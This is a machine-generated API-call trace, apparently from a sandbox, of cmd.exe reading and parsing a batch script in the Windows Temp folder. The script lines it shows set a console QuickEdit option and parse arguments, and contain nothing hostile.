[0178.029] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0bf0) returned 1 [0178.029] GetProcessHeap () returned 0x19a8f1e0000 [0178.029] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0178.029] GetProcessHeap () returned 0x19a8f1e0000 [0178.030] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0178.030] GetProcessHeap () returned 0x19a8f1e0000 [0178.030] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecda0) returned 1 [0178.030] GetProcessHeap () returned 0x19a8f1e0000 [0178.030] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0178.030] GetProcessHeap () returned 0x19a8f1e0000 [0178.030] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0178.031] GetProcessHeap () returned 0x19a8f1e0000 [0178.031] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca40) returned 1 [0178.031] GetProcessHeap () returned 0x19a8f1e0000 [0178.031] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0178.031] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.031] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0178.031] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.031] SetFilePointer (in: hFile=0x90, lDistanceToMove=5784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0178.032] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n not exist \"%SystemRoot%\\Temp\\\" mkdir \"%SystemRoot%\\Temp\" %nul%\r\nstrator'.\r\nnas\" && exit /b\r\n===========================================\r\n") returned 2 [0178.032] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.032] GetFileType (hFile=0x90) returned 0x1 [0178.032] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.032] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0178.032] GetProcessHeap () returned 0x19a8f1e0000 [0178.032] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.032] GetProcessHeap () returned 0x19a8f1e0000 [0178.033] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.033] _tell (_FileHandle=3) returned 5784 [0178.033] _close (_FileHandle=3) returned 0 [0178.033] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.033] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.033] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.033] SetFilePointer (in: hFile=0x90, lDistanceToMove=5784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0178.034] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.034] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0178.034] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.034] SetFilePointer (in: hFile=0x90, lDistanceToMove=5924, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0178.034] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0178.034] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.034] GetFileType (hFile=0x90) returned 0x1 [0178.034] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.034] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0178.034] GetProcessHeap () returned 0x19a8f1e0000 [0178.034] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.034] GetProcessHeap () returned 0x19a8f1e0000 [0178.035] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.035] _tell (_FileHandle=3) returned 5924 [0178.035] _close (_FileHandle=3) returned 0 [0178.035] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.035] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.035] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.035] SetFilePointer (in: hFile=0x90, lDistanceToMove=5924, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0178.035] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.035] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0178.035] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.036] SetFilePointer (in: hFile=0x90, lDistanceToMove=5926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0178.036] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0178.036] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.036] GetFileType (hFile=0x90) returned 0x1 [0178.036] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.036] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0178.036] GetProcessHeap () returned 0x19a8f1e0000 [0178.036] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.036] GetProcessHeap () returned 0x19a8f1e0000 [0178.036] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.036] _tell (_FileHandle=3) returned 5926 [0178.036] _close (_FileHandle=3) returned 0 [0178.037] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.037] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.037] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.037] SetFilePointer (in: hFile=0x90, lDistanceToMove=5926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0178.037] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.037] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0178.037] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.037] SetFilePointer (in: hFile=0x90, lDistanceToMove=6039, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0178.037] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: This code disables QuickEdit for this cmd.exe session only without making permanent changes to the registry\r\n", cbMultiByte=113, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: This code disables QuickEdit for this cmd.exe session only without making permanent changes to the registry\r\n=========================\r\n") returned 113 [0178.037] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.037] GetFileType (hFile=0x90) returned 0x1 [0178.037] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.037] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0178.038] GetProcessHeap () returned 0x19a8f1e0000 [0178.038] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.038] GetProcessHeap () returned 0x19a8f1e0000 [0178.038] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.038] _tell (_FileHandle=3) returned 6039 [0178.038] _close (_FileHandle=3) returned 0 [0178.038] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.039] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.039] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.039] SetFilePointer (in: hFile=0x90, lDistanceToMove=6039, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0178.039] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.039] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0178.039] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.039] SetFilePointer (in: hFile=0x90, lDistanceToMove=6178, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0178.039] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: It is added because clicking on the script window pauses the operation and leads to the confusion that script stopped due to an error\r\n", cbMultiByte=139, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: It is added because clicking on the script window pauses the operation and leads to the confusion that script stopped due to an error\r\n\n") returned 139 [0178.039] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.039] GetFileType (hFile=0x90) returned 0x1 [0178.039] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.039] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0178.039] GetProcessHeap () returned 0x19a8f1e0000 [0178.039] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.039] GetProcessHeap () returned 0x19a8f1e0000 [0178.040] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.040] _tell (_FileHandle=3) returned 6178 [0178.040] _close (_FileHandle=3) returned 0 [0178.040] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.040] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.040] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.040] SetFilePointer (in: hFile=0x90, lDistanceToMove=6178, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0178.040] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.041] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0178.041] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.041] SetFilePointer (in: hFile=0x90, lDistanceToMove=6180, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0178.041] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n It is added because clicking on the script window pauses the operation and leads to the confusion that script stopped due to an error\r\n\n") returned 2 [0178.041] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.041] GetFileType (hFile=0x90) returned 0x1 [0178.041] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.041] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0178.041] GetProcessHeap () returned 0x19a8f1e0000 [0178.041] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.041] GetProcessHeap () returned 0x19a8f1e0000 [0178.041] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.042] _tell (_FileHandle=3) returned 6180 [0178.042] _close (_FileHandle=3) returned 0 [0178.042] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.042] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.042] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.042] SetFilePointer (in: hFile=0x90, lDistanceToMove=6180, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0178.042] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.042] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0178.042] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.042] SetFilePointer (in: hFile=0x90, lDistanceToMove=6220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0178.042] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _MASunattended set quedit=1\r\n", cbMultiByte=40, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined _MASunattended set quedit=1\r\nscript window pauses the operation and leads to the confusion that script stopped due to an error\r\n\n") returned 40 [0178.043] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.043] GetFileType (hFile=0x90) returned 0x1 [0178.043] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.043] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0178.043] GetProcessHeap () returned 0x19a8f1e0000 [0178.043] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.043] GetProcessHeap () returned 0x19a8f1e0000 [0178.043] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.043] _wcsicmp (_String1="if", _String2=")") returned 64 [0178.043] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0178.043] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0178.043] _wcsicmp (_String1="IF", _String2="if") returned 0 [0178.043] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecd00 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0ab0 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0ab0, Size=0x22) returned 0x19a8f1eb800 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x22 [0178.044] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0178.044] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0178.044] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0178.044] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0178.044] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0e30 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8820 [0178.044] GetProcessHeap () returned 0x19a8f1e0000 [0178.044] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8820, Size=0x30) returned 0x19a8f1e0a70 [0178.045] GetProcessHeap () returned 0x19a8f1e0000 [0178.045] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0a70) returned 0x30 [0178.045] _wcsicmp (_String1="set", _String2=")") returned 74 [0178.045] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0178.045] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0178.045] _wcsicmp (_String1="IF", _String2="set") returned -10 [0178.045] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0178.045] _wcsicmp (_String1="REM", _String2="set") returned -1 [0178.045] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0178.045] GetProcessHeap () returned 0x19a8f1e0000 [0178.045] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0178.045] GetProcessHeap () returned 0x19a8f1e0000 [0178.045] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec700 [0178.045] GetProcessHeap () returned 0x19a8f1e0000 [0178.045] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb8f0 [0178.045] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0178.045] _tell (_FileHandle=3) returned 6220 [0178.045] _close (_FileHandle=3) returned 0 [0178.046] GetEnvironmentVariableW (in: lpName="_MASunattended", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="CD") returned -4 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="ERRORLEVEL") returned -6 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="CMDEXTVERSION") returned -4 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="CMDCMDLINE") returned -4 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="DATE") returned -5 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="TIME") returned -21 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="RANDOM") returned -19 [0178.046] _wcsicmp (_String1="_MASunattended", _String2="HIGHESTNUMANODENUMBER") returned -9 [0178.046] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.047] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0178.047] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.047] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0178.047] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.047] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.048] SetConsoleInputExeNameW () returned 0x1 [0178.048] GetConsoleOutputCP () returned 0x1b5 [0178.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.048] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.049] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0178.049] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0178.049] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.049] SetFilePointer (in: hFile=0x90, lDistanceToMove=6220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0178.049] GetProcessHeap () returned 0x19a8f1e0000 [0178.049] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.049] GetProcessHeap () returned 0x19a8f1e0000 [0178.049] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0178.049] GetProcessHeap () returned 0x19a8f1e0000 [0178.050] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0178.050] GetProcessHeap () returned 0x19a8f1e0000 [0178.050] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0178.050] GetProcessHeap () returned 0x19a8f1e0000 [0178.051] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e30) returned 1 [0178.051] GetProcessHeap () returned 0x19a8f1e0000 [0178.051] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.051] GetProcessHeap () returned 0x19a8f1e0000 [0178.051] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0178.051] GetProcessHeap () returned 0x19a8f1e0000 [0178.052] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0178.052] GetProcessHeap () returned 0x19a8f1e0000 [0178.052] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd00) returned 1 [0178.052] GetProcessHeap () returned 0x19a8f1e0000 [0178.052] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0178.052] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.052] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0178.052] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.053] SetFilePointer (in: hFile=0x90, lDistanceToMove=6282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0178.053] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%# in (%_args%) do (if /i \"%%#\"==\"-qedit\" set quedit=1)\r\n", cbMultiByte=62, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for %%# in (%_args%) do (if /i \"%%#\"==\"-qedit\" set quedit=1)\r\nhe operation and leads to the confusion that script stopped due to an error\r\n\n") returned 62 [0178.053] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.053] GetFileType (hFile=0x90) returned 0x1 [0178.053] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.053] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0178.053] GetProcessHeap () returned 0x19a8f1e0000 [0178.053] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.053] GetProcessHeap () returned 0x19a8f1e0000 [0178.053] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.053] GetProcessHeap () returned 0x19a8f1e0000 [0178.053] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0178.054] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.054] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0178.054] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0178.054] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0178.054] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0178.054] _wcsicmp 